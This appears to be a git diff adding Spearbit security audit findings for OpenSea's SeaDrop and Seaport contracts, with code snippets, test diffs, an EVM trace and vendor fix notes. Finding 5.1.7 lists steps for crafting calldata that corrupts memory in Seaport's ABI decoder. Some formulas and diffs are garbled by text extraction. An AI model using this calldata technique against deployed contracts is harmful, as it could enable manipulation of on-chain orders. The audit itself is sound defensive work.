a restrictFeeRecip- ients == false. OpenSea: This logic is now updated where the admin can set to false if they would like in the commit cbd5ce5. +5.5.16 Reformat lines for better readability Severity: Informational Context: SeaDrop.sol#L76-L83 Description: These lines are too long to be readable. A mistake isn't easy to spot. Recommendation: Reformat these lines into: 29 bytes32 internal immutable _SIGNED_MINT_TYPEHASH = keccak256( "SignedMint(" "address nftContract," "address minter," "address feeRecipient," "MintParams mintParams" ")" "MintParams(" "uint256 mintPrice," "uint256 maxTotalMintableByWallet," "uint256 startTime," "uint256 endTime," "uint256 dropStageIndex," "uint256 maxTokenSupplyForStage," // <--- this was also missing in the audit repo "uint256 feeBps," "bool restrictFeeRecipients" ")" ); bytes32 internal immutable _EIP_712_DOMAIN_TYPEHASH = keccak256( "EIP712Domain(" "string name," "string version," "uint256 chainId," "address verifyingContract" ")" ); OpenSea: Fixed: fd07a8b. Spearbit: Acknowledged. +5.5.17 Comment is a copy-paste Severity: Informational Context: SeaDrop.sol#L51, SeaDrop.sol#L54 Description: This comment is exactly the same as this one. This is a copy-paste mistake. Recommendation: Consider writing another description on L54. OpenSea: Fixed in commit 8ebff0d. Spearbit: Acknowledged. +5.5.18 Replace setBatchTokenURIs() Severity: Informational Context: ERC721ContractMetadata.sol#L94-L108 Description: This was discussed with OpenSea: This method should be renamed to something like emitBatchTokenURIUpdated and have the string calldata parameter removed. It was meant as a shortcut for emitting the event when only subsets of token metadata have actually changed, and is mostly informational/instructional. OpenSea: Fixed in commit b8566fa. Spearbit: Acknowledged. 30 +5.5.19 Remove unused imports Severity: Informational Context: ERC721ContractMetadata.sol#L6-L27, SeaDrop.sol#L16 Recommendation: Removing the unused imports improves code-quality. In ERC721ContractMetadata.sol, the following imports are unused: MaxMintable, TwoStepOwnable, AllowList, Ownable, ECDSA, ConstructorInitializable and IERC721ContractMetadata. In SeaDrop.sol, the import ERC20 is unused. +5.5.20 Missing comment about PublicDrops endTimestamp Severity: Informational Context: lib/SeaDropErrorsAndEvents.sol#L7-L14, SeaDrop.sol#L134 Recommendation: Consider adding a comment type(uint64).max. OpenSea: Fixed in commits 7f1456d and 27e3435. that for PublicDrops endTimestamp value should be Spearbit: Acknowledged. +5.5.21 Misaligned lines Severity: Informational Context: SeaDropErrorsAndEvents.sol#L160-L177 Recommendation: Consider adding indents to align with other lines. OpenSea: Fixed in commit 24ed58d. Spearbit: Acknowledged. +5.5.22 Usage of floating pragma is not recommended Severity: Informational Context: • SeaDrop.sol#L2, • ERC721SeaDrop.sol#L2, • ERC721ContractMetadata.sol#L2, • lib/SeaDropStructs.sol#L2, • lib/SeaDropErrorsAndEvents.sol#L2, • interfaces/ISeaDrop.sol#L2, • interfaces/IERC721SeaDrop.sol#L2, • interfaces/IERC721ContractMetadata.sol#L2 Description: • ˆ0.8.11 is declared in files. • In foundry.toml: solc_version = '0.8.15' is used for the default build profile. • In hardhat.config.ts and hardhat-coverage.config.ts: "0.8.14" is used. 31 Recommendation: Consider documenting the actual compiler version and flags used to get the compiled byte- code which is going to be deployed on-chain OpenSea: Fixed in commit 9d87bfc. Spearbit: Acknowledged. 32 diff --git a/findings_newupdate/spearbit/Seaport-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Seaport-Spearbit-Security-Review.txt new file mode 100644 index 0000000..68c0180 --- /dev/null +++ b/findings_newupdate/spearbit/Seaport-Spearbit-Security-Review.txt @@ -0,0 +1,92 @@ +5.1.1 The spent offer amounts provided to OrderFulfilled for collection of (advanced) orders is not the actual amount spent in general Severity: Medium Risk Context: • OrderCombiner.sol#L455-L463 • OrderFulfiller.sol#L377-L385 Description: When Seaport is called to fulfill or match a collection of (advanced) orders, the OrderFulfilled is called before applying fulfillments and executing transfers. The offer and consideration items have the following forms: C = (It , T , i, acurr , R, acurr ) O = (It , T , i, acurr , acurr ) Where parameter description It T i acurr R O C itemType token identifier the interpolation of startAmount and endAmount depending on the time and the fraction of the order. consideration item's recipient offer item. consideration item. The SpentItems and ReceivedItem items provided to OrderFulfilled event ignore the last component of the offer/consideration items in the above form since they are redundant. Seaport enforces that all consideration items are used. But for the endpoints in this context, we might end up with offer items with only a portion of their amounts being spent. So in the end O.acurr might not be the amount spent for this offer item, but OrderFulfilled emits O.acurr as the amount spent. This can cause discrepancies in off-chain bookkeeping by agents listening for this event. The fulfillOrder and fulfillAdvancedOrder do not have this issue, since all items are enforced to be used. These two endpoints also differ from when there are collections of (advanced) orders, in that they would emit the OrderFulfilled at the of their call before clearing the reentrancy guard. Recommendation: Make sure the accounting is updated to only provide the spent offer item amounts to Order- Fulfilled. Moving the emission of this event to the end of the call flow, before clearing the reentrancy guard like the above mentioned simpler endpoint would make it easier to provide the correct values (and also would make the whole flow between different endpoints more consistent and potentially create an opportunity to refactor the codebase further). Seaport: Fixed in PR 839 by making sure all unspent offer amounts are transferred to the recipient provided by the msg.sender. Spearbit: Verified. 6 +5.1.2 The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general Severity: Medium Risk Context: • OrderCombiner.sol#L802-L807 • ConsiderationEncoder.sol#L440-L443 • ZoneInterface.sol#L13-L15 • ContractOffererInterface.sol#L16-L22 • OrderCombiner.sol#L322-L325 • FulfillmentApplier.sol#L299-L306 • FulfillmentApplier.sol#L432-L433 • FulfillmentApplier.sol#L120-L125 • OrderCombiner.sol#L794-L798 Description: When Seaport is called to fulfill or match a collection of (advanced) orders, there are scenarios where not all offer items will be used. When not all the current amount of an offer item is used and if this offer item belongs to an order which is of either CONTRACT order type or it is restricted order (and the caller is not the zone), then the spent amount shared with either the contract offerer or zone through their respective endpoints (validateOrder for zones and ratifyOrder for contract offerers) does not reflect the actual amount spent. When Seaport is called through one of its more complex endpoints to match or fulfill orders, the offer items go through a few phases: parameter description It T i as ae acurr O itemType token identifier startAmount endAmount the interpolation of startAmount and endAmount depending on the time and the fraction of the order. offer item. • Let's assume an offer item is originally O = (It , T , i, as, ae) • In _validateOrdersAndPrepareToFulfill, O gets transformed into (It , T , i, acurr , acurr ) • Then depending on whether the order is part of a match (1, 2. 3) or fulfillment (1, 2) order and there is a corresponding fulfillment data pointing at this offer item, it might transform into (It , T , i, b, acurr ) where b 2 [0, 1). For fulfilling a collection of orders b 2 {0, acurr } depending on whether the offer item gets used or not, but for match orders, it can be in the more general range of b 2 [0, 1). • And finally for restricted or CONTRACT order types before calling _assertRestrictedAdvancedOrderValidity, the offer item would be transformed into (It , T , i, acurr , acurr ). So the startAmount of an offer item goes through the following flow: as ! acurr ! b 2 [0, 1) ! acurr 7 And at the end acurr is the amount used when Seaport calls into the validateOrder of a zone or ratifyOrder of a contract offerer. acurr does not reflect the actual amount that this offer item has contributed to a combined amount used for an execution transfer. Recommendation: For non-matched collection of (advanced) orders the actual spent amount for an offer item is acurr (cid:0) b 2 {0, acurr } which basically reflects whether the item has been used or not. So for these 2 Seaport endpoints (fulfillAvailableOrders, fulfillAvailableAdvancedOrders), one can cal- culate the actual spent amount. For example, at the end of the flow for startAmount, one can do: // Utilize assembly to calculate the spent amount. assembly { let startAmountPtr := add(offerItem, Common_amount_offset) let originalAmount := mload(add(offerItem, Common_endAmount_offset)) let unusedAmount := mload(startAmountPtr) mstore( startAmountPtr , sub(originalAmount, unusedAmount) ) } For matched orders since in certain scenarios, b can be any number in B256, it would be hard to say how much of that particular offer item was spent or not spent. And so the above suggestion would not work in general for matched orders. Seaport: Fixed in PR 839 by making sure all unspent offer amounts are transferred to the recipient provided by the msg.sender. Spearbit: Verified. +5.1.3 Empty criteriaResolvers for criteria-based contract orders Severity: Medium Risk Context: • OrderValidator.sol#L312-L315 • CriteriaResolution.sol#L119 Description: There is a deviation in how criteria-based items are resolved for contract orders. For contract orders which have offers with criteria, the _compareItems function checks that the contract offerer returned a corresponding non-criteria based itemType when identifierOrCriteria for the original item is 0, i.e., offering from an entire collection. Afterwards, the orderParameters.offer array is replaced by the offer array returned by the contract offerer. For other criteria-based orders such as offers with identifierOrCriteria = 0, the itemType of the order is only updated during the criteria resolution step. This means that for such offers there should be a corresponding CriteriaResolver struct. See the following test: 8 modified @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { test/advanced.spec.ts // Seller approves marketplace contract to transfer NFTs await set1155ApprovalForAll(seller, marketplaceContract.address, true); - - + const { root, proofs } = merkleTree([nftId]); const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))]; const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))]; const consideration = [ getItemETH(parseEther("10"), parseEther("10"), seller.address), @@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { getItemETH(parseEther("1"), parseEther("1"), owner.address), ]; + - + // Replacing by `const criteriaResolvers = []` will revert const criteriaResolvers = [ buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]), buildResolver(0, 0, 0, nftId, []), ]; const { order, orderHash, value } = await createOrder( However, in case of contract offers with identifierOrCriteria = 0, Seaport 1.2 does not expect a corresponding CriteriaResolver struct and will revert if one is provided as the itemType was updated to be the corresponding non-criteria based itemType. See advanced.spec.ts#L510 for a test case. Note: this also means that the fulfiller cannot explicitly provide the identifier when a contract order is being fulfilled. A malicious contract may use this to their advantage. For example, assume that a contract offerer in Seaport only accepts criteria-based offers. The fulfiller may first call previewOrder where the criteria is always resolved to a rare NFT, but the actual execution would return an uninteresting NFT. If such offers also required a corresponding resolver (similar behaviour as regular criteria based orders), then this could be fixed by explicitly providing the identifier--akin to a slippage check. In short, for regular criteria-based orders with identifierOrCriteria = 0 the fulfiller can pick which identifier to receive by providing a CriteriaResolver (as long as it's valid). For contract orders, fulfillers don't have this option and contracts may be able to abuse this. Recommendation: An alternative approach to criteria-based contract orders would be to remove the extra case in _compareItems. Now, contract offers will have to return the same itemType and identifierOrCriteria when a generateOrder call is made. However, this means that the fulfiller will be able to choose the identifier it wants to receive. This may not be the ideal in some cases, but it remains consistent with regular orders. Seaport: We documented this deviation in PR 849. Spearbit: Verified. 9 +5.1.4 Advance orders of CONTRACT order types can generate orders with less consideration items that would break the aggregation routine Severity: Medium Risk Context: • OrderValidator.sol#L444-L447 • FulfillmentApplier.sol#L561-L569 Description: When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CON- TRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide fewer consideration items for this order. So the total number of consideration items might be less than the ones provided by the caller. But since the caller would need to provide the fulfillment data beforehand to Seaport, they might use indices that would turn to be out of range for the consideration in question after the modification applied for the contract offerer above. If this happens, the whole call will be reverted. This issue is in the same category as Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine. Recommendation: In order for the caller to be able to fulfill/match orders by figuring out how to aggregate and match different consideration and offer items, they would need to be able to have access to all the data before calling into Seaport. Contract offerers are supposed to (it is not enforced currently) implement previewOrder which the caller can use before making a call to Seaport. But there is no guarantee that the data returned by previewOrder and generateOrder for the same shared inputs would be the same. We can enforce that the contract offerer does not return fewer consideration items. If it needed to return less it can either revert or provide a 0 amount. If the current conditions are going to stay the same, it is recommended to document this scenario and also provide more comments/documentation for ContractOffererInterface. Seaport: Addressed in PR 842. Spearbit: Verified. +5.1.5 AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT or- der type Severity: Medium Risk Context: • OrderValidator.sol#L150-L153 • OrderCombiner.sol#L455-L463 Description: For most advanced order types, we have the following check: // Read numerator and denominator from memory and place on the stack. uint256 numerator = uint256(advancedOrder.numerator); uint256 denominator = uint256(advancedOrder.denominator); // Ensure that the supplied numerator and denominator are valid. if (numerator > denominator || numerator == 0) { _revertBadFraction(); } For CONTRACT order types this check is skipped. For later calculations (calculating the current amount) Seaport uses the numerator and denominator returned by _getGeneratedOrder which as a pair it's either (1, 1) or (0, 0). advancedOrder.numerator is only used to skip certain operations in some loops when it is 0: • Skip applying criteria resolvers. 10 • Skip aggregating the amount for executions. • Skip the final validity check. Skipping the above operations would make sense. But when for an advancedOrder with CONTRACT order type _get- GeneratedOrder returns (h, 1, 1) and advancedOrder.numerator == 0, we would skip applying criteria resolvers, aggregating the amounts from offer or consideration amounts for this order and skip the final validity check that would call into the ratifyOrder endpoint of the offerer. But emiting the following OrderFulfilled will not be skipped, even though this advancedOrder will not be used. // Emit an OrderFulfilled event. _emitOrderFulfilledEvent( orderHash, orderParameters.offerer, orderParameters.zone, recipient, orderParameters.offer, orderParameters.consideration ); This can create discrepancies between what happens on chain and what off-chain agents index/record. Recommendation: Even though AdvancedOrder.numerator and AdvancedOrder.denominator are not really used for advanced orders of CONTRACT type and AdvancedOrder.numerator is only used for signaling certain decision in the call, it would be best to either hoist the checks regarding these parameters to an earlier point: // Read numerator and denominator from memory and place on the stack. uint256 numerator = uint256(advancedOrder.numerator); uint256 denominator = uint256(advancedOrder.denominator); // Ensure that the supplied numerator and denominator are valid. if (numerator > denominator || numerator == 0) { _revertBadFraction(); } // If the order is a contract order, return the generated order. if (orderParameters.orderType == OrderType.CONTRACT) { // Return the generated order based on the order params and the // provided extra data. If revertOnInvalid is true, the function // will revert if the input is invalid. return _getGeneratedOrder( orderParameters, advancedOrder.extraData, revertOnInvalid ); } for orderParameters.orderType == OrderType.CONTRACT enforce that advancedOrder.numerator == or advancedOrder.denominator == 1. Seaport: Fixed in PR 815. Spearbit: Verified. 11 +5.1.6 Calls to PausableZone's executeMatchAdvancedOrders and executeMatchOrders would revert if un- used native tokens would need to be returned Severity: Medium Risk Context: • PausableZone.sol#L34 • PausableZone.sol#L149 • PausableZone.sol#L188 • OrderCombiner.sol#L704-L707 Description: In match (advanced) orders, one can provide native tokens as offer and consideration items. So a PausableZone would need to provide msg.value to call the corresponding Seaport endpoints. There are a few scenarios where not all the msg.value native tokens amount provided to the Seaport marketplace will be used: 1. Rounding errors in calculating the current amount of offer or consideration items. The zone can prevent send- ing extra native tokens to Seaport by pre-calculating these values and making sure to have its transaction to be included in the specific block that these values were calculated for (this is important when the start and end amount of an item are not equal). 2. The zone (un)intentionally sends more native tokens that it is necessary to Seaport. 3. The (advanced) orders sent for matching in Seaport include order type of CONTRACT offerer order and the of- ferer contract provides different amount for at least one item that would eventually make the whole transaction not use the full amount of msg.value provided to it. In all these cases, since PausableZone does not have a receive or fallback endpoint to accept native tokens, when Seaport tries to send back the unsued native token amount the transaction may revert. PausableZone not accepting native tokens: $ export CODE=$(jq -r '.deployedBytecode' artifacts/contracts/zones/PausableZone.sol/PausableZone.json | tr -d '\n') ,! $ evm --code $CODE --value 1 --prestate genesis.json --sender ,! 0xb4d0000000000000000000000000000000000000 --nomemory=false --debug run $ evm --input $(echo $CODE | head -c 44 - | sed -E s/0x//) disasm 6080806040526004908136101561001557600080fd 00000: PUSH1 0x80 00002: DUP1 00003: PUSH1 0x40 00005: MSTORE 00006: PUSH1 0x04 00008: SWAP1 00009: DUP2 0000a: CALLDATASIZE 0000b: LT 0000c: ISZERO 0000d: PUSH2 0x0015 00010: JUMPI 00011: PUSH1 0x00 00013: DUP1 00014: REVERT trace of evm ... --debug run error: execution reverted #### TRACE #### PUSH1 pc=00000000 gas=4700000 cost=3 DUP1 pc=00000002 gas=4699997 cost=3 12 Stack: 00000000 0x80 PUSH1 Stack: 00000000 00000001 MSTORE Stack: 00000000 00000001 00000002 PUSH1 Stack: 00000000 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 SWAP1 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 DUP2 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 pc=00000003 gas=4699994 cost=3 pc=00000005 gas=4699991 cost=12 pc=00000006 gas=4699979 cost=3 0x80 0x80 0x40 0x80 0x80 0x80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000008 gas=4699976 cost=3 0x4 0x80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000009 gas=4699973 cost=3 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000010 gas=4699970 cost=2 0x4 0x80 0x4 CALLDATASIZE Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| 13 LT Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 ISZERO Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH2 Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 JUMPI Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH1 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 pc=00000011 gas=4699968 cost=3 0x0 0x4 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000012 gas=4699965 cost=3 0x1 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000013 gas=4699962 cost=3 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000016 gas=4699959 cost=10 0x15 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000017 gas=4699949 cost=3 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 14 00000030 00000040 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| DUP1 Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 REVERT Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 pc=00000019 gas=4699946 cost=3 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000020 gas=4699943 cost=0 0x0 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| #### LOGS #### genesis.json: { "gasLimit": "4700000", "difficulty": "1", "alloc": { "0xb4d0000000000000000000000000000000000000": { "balance": "10000000000000000000000000", "code": "", "storage": {} } } } // file: test/zone.spec.ts ... it("Fulfills an order with executeMatchAdvancedOrders with NATIVE Consideration Item", async () => { const pausableZoneControllerFactory = await ethers.getContractFactory( "PausableZoneController", owner ); const pausableZoneController = await pausableZoneControllerFactory.deploy( owner.address ); // Deploy pausable zone const zoneAddr = await createZone(pausableZoneController); 15 // Mint NFTs for use in orders const nftId = await mintAndApprove721(seller, marketplaceContract.address); // Define orders const offerOne = [ getTestItem721(nftId, toBN(1), toBN(1), undefined, testERC721.address), ]; const considerationOne = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther("0.01"), parseEther("0.01"), seller.address ), ]; const { order: orderOne, orderHash: orderHashOne } = await createOrder( seller, zoneAddr, offerOne, considerationOne, 2 ); const offerTwo = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther("0.01"), parseEther("0.01"), undefined ), ]; const considerationTwo = [ getTestItem721( nftId, toBN(1), toBN(1), buyer.address, testERC721.address ), ]; const { order: orderTwo, orderHash: orderHashTwo } = await createOrder( buyer, zoneAddr, offerTwo, considerationTwo, 2 ); const fulfillments = [ [[[0, 0]], [[1, 0]]], [[[1, 0]], [[0, 0]]], ].map(([offerArr, considerationArr]) => toFulfillment(offerArr, considerationArr) ); // Perform the match advanced orders with zone const tx = await pausableZoneController .connect(owner) 16 .executeMatchAdvancedOrders( zoneAddr, marketplaceContract.address, [orderOne, orderTwo], [], fulfillments, { value: parseEther("0.01").add(1) } // the extra 1 wei reverts the tx ); // Decode all events and get the order hashes const orderFulfilledEvents = await decodeEvents(tx, [ { eventName: "OrderFulfilled", contract: marketplaceContract }, ]); expect(orderFulfilledEvents.length).to.equal(fulfillments.length); // Check that the actual order hashes match those from the events, in order const actualOrderHashes = [orderHashOne, orderHashTwo]; orderFulfilledEvents.forEach((orderFulfilledEvent, i) => expect(orderFulfilledEvent.data.orderHash).to.be.equal( actualOrderHashes[i] ) ); }); ... This bug also applies to Seaport 1.1 and PausableZone (0x004C00500000aD104D7DBd00e3ae0A5C00560C00) Recommendation: It is really important for zones that are trying to match orders that would involve native tokens to be able to receive those tokens back from Seaport if all of them are not used. In case of Solidity contracts, one should define receive or fallback endpoints for these contracts (or the __default__ function if using Vyper). Seaport: Acknowledged. Spearbit: Acknowledged. +5.1.7 ABI decoding for bytes: memory can be corrupted by maliciously constructing the calldata Severity: Medium Risk Context: ConsiderationDecoder.sol#L51-L62 Description: In the code snippet below, size can be made 0 by maliciously crafting the calldata. In this case, the free memory is not incremented. assembly { mPtrLength := mload(0x40) let size := and( add( and(calldataload(cdPtrLength), OffsetOrLengthMask), AlmostTwoWords ), OnlyFullWordMask ) calldatacopy(mPtrLength, cdPtrLength, size) mstore(0x40, add(mPtrLength, size)) } This has two different consequences: 1. If the memory offset mPtrLength is immediately used then junk values at that memory location can be interpreted as the decoded bytes type. In the case of Seaport 1.2, the likelihood of the current free memory pointing to junk value is low. So, this case has low severity. 17 2. The consequent memory allocation will also use the value mPtrLength to store data in memory. This can lead to corrupting the initial memory data. In the worst case, the next allocation can be tuned so that the first bytes data can be any arbitrary data. To make the size calculation return 0: 1. Find a function call which has bytes as a (nested) parameter. 2. Modify the calldata field where the length of the above byte is stored to the new length 0xffffe0. 3. The calculation will now return size = 0. Note: there is an additional requirement that this bytes type should be inside a dynamic struct. Otherwise, for example, in case of function foo(bytes calldata signature) , the compiler will insert a check that calldata- size is big enough to fit signature.length. Since the value 0xffffe0 is too big to be fit into calldata, such an attack is impractical. However, for bytes type inside a dynamic type, for example in function foo(bytes[] calldata signature), this check is skipped by solc (likely because it's expensive). For a practical exploit we need to look for such function. In case of Seaport 1.2 this could be the matchAdvancedOrders(AdvancedOrder[] calldata orders, ...) function. The struct AdvancedOrder has a nested parameter bytes signature as well as bytes extraData. In the above exploit one would be able to maliciously modify the calldata in such a way that Seaport would interpret the data in extraData as the signature. Here is a proof of concept for a simplified case that showcases injecting an arbitrary value into a decoded bytes. As for severity, even though interpreting calldata differently may not fundamentally break the protocol, an attacker with enough effort may be able to use this for subtle phishing attacks or as a precursor to other attacks. Recommendation: Updating OnlyFullWordMask to 0xff_ff_ff_e0 will not fix this as you can still replace len by 0xff_ff_ff_e0 and get the same effect. Also see The size calculation can be incorrect for large numbers. Seaport: Fixed in PR 789. Spearbit: Verified. 5.2 Low Risk +5.2.1 Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine Severity: Low Risk Context: • ConsiderationDecoder.sol#L569-L574 • FulfillmentApplier.sol#L722-L736 Description: When Seaport receives a collection of advanced orders to match or fulfill, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. genera- teOrder(...) can provide new consideration item recipients for this order. These new recipients are going to be used for this order from this point on. In _getGeneratedOrder, there is no comparison between old or new consideration recipients. The provided new recipients can create an issue when aggregating consideration items. Since the fulfillment data is provided beforehand by the caller of the Seaport endpoint, the caller might have provided fulfillment aggregation data that would have aggregated/combined one of the consideration items of this changed advance order with another consideration item. But the aggregation had taken into consideration the original recipient of the order in question. Multiple consideration items can only be aggregated if they share the same itemType, token, identi- fier, and recipient (ref). The new recipients provided by the contract offerer can break this invariant and in turn cause a revert. Recommendation: Either 18 • The original consideration item recipients would need to be shared with the contract offerer when genera- teOrder(...) is called and they would stay the same for the new consideration items. This way the offerer can check these recipients and revert the call if needed. In this case, the caller of Seaport endpoints would need to somehow (perhaps using the previewOrder endpoint) get the recipients beforehand. • Ensure that the old and new consideration recipients are the same. Additionally and if changes are not applied, consider documenting this scenario for the users you call into Sea- port or create custom offerer contracts. Adding more comments/documentation for previewOrder endpoint and generateOrder is also recommended. Seaport: Fixed in PR 824 which ensures that either the new recipient can be any address if the original was address(0) or the new and old consideration recipients have to match (otherwise the call would revert). Spearbit: Verified. +5.2.2 CriteriaResolvers.criteriaProof is not validated in the identifierOrCriteria == 0 case Severity: Low Risk Context: CriteriaResolution.sol#L199-L206 Description: In the case of identifierOrCriteria == 0, the criteria resolver completely skips any validations on the Merkle proof and in particular is missing the validation that CriteriaResolvers.criteriaProof.length == 0. Note: This is also present in Seaport 1.1 and may be a known issue. Proof of concept: modified @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { test/advanced.spec.ts // Seller approves marketplace contract to transfer NFTs await set1155ApprovalForAll(seller, marketplaceContract.address, true); - - + const { root, proofs } = merkleTree([nftId]); const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))]; const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))]; const consideration = [ getItemETH(parseEther("10"), parseEther("10"), seller.address), @@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { getItemETH(parseEther("1"), parseEther("1"), owner.address), ]; + - + // Add a junk criteria proof and the test still passes const criteriaResolvers = [ buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]), buildResolver(0, 0, 0, nftId, ,! ["0xdead000000000000000000000000000000000000000000000000000000000000"]), ]; const { order, orderHash, value } = await createOrder( Recommendation: Consider adding the following additional check: 19 modified @@ -203,6 +203,8 @@ contract CriteriaResolution is CriteriaResolutionErrors { contracts/lib/CriteriaResolution.sol + + identifierOrCriteria, criteriaResolver.criteriaProof ); } else { require(criteriaResolver.criteriaProof.length == 0); } // Update item type to remove criteria usage. Seaport: Fixed in PR 825. Spearbit: Verified. +5.2.3 Calls to TypehashDirectory will be successful Severity: Low Risk Context: • TypehashDirectory.sol#L119 Description: TypehashDirectory's deployed bytecode starts with 00 which corresponds to STOP opcode (SSTORE2 also uses this pattern). This choice for the 1st bytecode causes accidental calls to the contract to succeed silently. 